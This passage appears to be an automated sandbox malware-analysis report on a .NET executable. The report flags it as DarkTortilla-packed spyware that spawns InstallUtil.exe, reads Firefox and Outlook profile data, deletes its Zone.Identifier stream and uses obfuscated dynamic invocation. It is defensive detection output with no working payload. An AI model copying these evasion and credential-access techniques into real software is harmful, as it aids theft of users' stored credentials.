                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747EFF80_2_0747EFF8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747D7800_2_0747D780
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747AE520_2_0747AE52
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747BEEA0_2_0747BEEA
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747E1480_2_0747E148
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07478DB80_2_07478DB8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747401E0_2_0747401E
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07472F800_2_07472F80
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747CEF80_2_0747CEF8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C4B500_2_078C4B50
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C6EB80_2_078C6EB8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C66200_2_078C6620
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078CC1D80_2_078CC1D8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C18200_2_078C1820
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C8BA80_2_078C8BA8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C8BB80_2_078C8BB8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C23CF0_2_078C23CF
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C23D00_2_078C23D0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C13F00_2_078C13F0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C0B100_2_078C0B10
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C0B200_2_078C0B20
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C4B4A0_2_078C4B4A
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C5B580_2_078C5B58
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C5B680_2_078C5B68
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C661A0_2_078C661A
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C0E100_2_078C0E10
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C16680_2_078C1668
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C16780_2_078C1678
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C11B90_2_078C11B9
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C9DB00_2_078C9DB0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C11C80_2_078C11C8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078CA5180_2_078CA518
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C00070_2_078C0007
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C14000_2_078C1400
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C18100_2_078C1810
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C00400_2_078C0040
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E44C780_2_07E44C78
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E44C680_2_07E44C68
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E4EBF00_2_07E4EBF0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_08234A580_2_08234A58
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082306E00_2_082306E0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082545600_2_08254560
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082500060_2_08250006
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082500400_2_08250040
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082545350_2_08254535
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_010940F04_2_010940F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_01094D084_2_01094D08
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_010944384_2_01094438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_01091CB44_2_01091CB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_066D6D704_2_066D6D70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_066D41884_2_066D4188
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_066D22004_2_066D2200
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_067596A84_2_067596A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_067500404_2_06750040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0675C4104_2_0675C410
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_067564F84_2_067564F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06759E284_2_06759E28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06753AE84_2_06753AE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_067500074_2_06750007
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06753AA84_2_06753AA8
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2692688876.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000000.2026333033.000000000066E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameu7df.exe@ vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2705489747.0000000007860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs Xc501VOacR.exe
                        Source: Xc501VOacR.exe, 00000000.00000002.2694977464.000000000313B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
                        Source: Xc501VOacR.exeBinary or memory string: OriginalFilenameu7df.exe@ vs Xc501VOacR.exe
                        Source: Xc501VOacR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Xc501VOacR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Xc501VOacR.exe, Wd60Z.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xc501VOacR.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: Xc501VOacR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Xc501VOacR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Xc501VOacR.exeReversingLabs: Detection: 73%
                        Source: unknownProcess created: C:\Users\user\Desktop\Xc501VOacR.exe "C:\Users\user\Desktop\Xc501VOacR.exe"
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Xc501VOacR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Xc501VOacR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Yara detected DarkTortilla Crypter
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.5550000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.40a5470.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.40a5470.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.5550000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Xc501VOacR.exe PID: 2228, type: MEMORYSTR
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: Xc501VOacR.exe, n7QYq.cs.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CD8AB0 push eax; iretd 0_2_02CD9039
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_02CDCA30 push 4C0529FCh; ret 0_2_02CDCB15
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0535C409 push eax; retf 0_2_0535C40A
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_05355049 push esp; retf 0_2_0535504A
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0601E018 push eax; retn 05A4h0_2_0601E0C1
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07477733 push edi; ret 0_2_0747792E
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747A3ED push ds; retf 0040h0_2_0747A43E
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0747793C push eax; ret 0_2_0747796D
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0823D44F push ecx; retf EFCDh0_2_0823D5BA
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0825D07C pushad ; retf 0_2_0825D0D5
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0825A1A9 push ecx; retf 0046h0_2_0825A1CA
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_0825F1D8 push eax; iretd 0_2_0825F22E
                        Source: Xc501VOacR.exeStatic PE information: section name: .text entropy: 7.180225181330332
                        Source: Xc501VOacR.exe, y5C3J.csHigh entropy of concatenated method names: 's5NAg', 'f7A0E', 'e7G1Y', 'n8ESx', 'Kb02T', 'Ts8z4', 'Wp75Y', 'i9FCk', 'Mf5p2', 'Jb56H'
                        Source: Xc501VOacR.exe, Yp19F.csHigh entropy of concatenated method names: 'm8LRw', 'Xq43C', 'Zw8t3', 'Zq3i2', 'i9A3P', 'z3Y2H', 'd6J5T', 'y4K5E', 'Rm1e6', 'c6R0D'
                        Source: Xc501VOacR.exe, Wd60Z.csHigh entropy of concatenated method names: 'Yz6q4', 'b1X4S', 'Cr74A', 'Sc04N', 'n7C4T', 'f6E2N', 'Le8q7', 'o1YBn', 'Qb01Z', 'd5WDy'
                        Source: Xc501VOacR.exe, p6Y1.csHigh entropy of concatenated method names: 'r7C8', 'Lg01', 'e2GM', 'j4JA', 'q2A0', 'Hp60', 'Sr9p', 'w0E9', 'Qb26', 'An92'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeFile opened: C:\Users\user\Desktop\Xc501VOacR.exe\:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
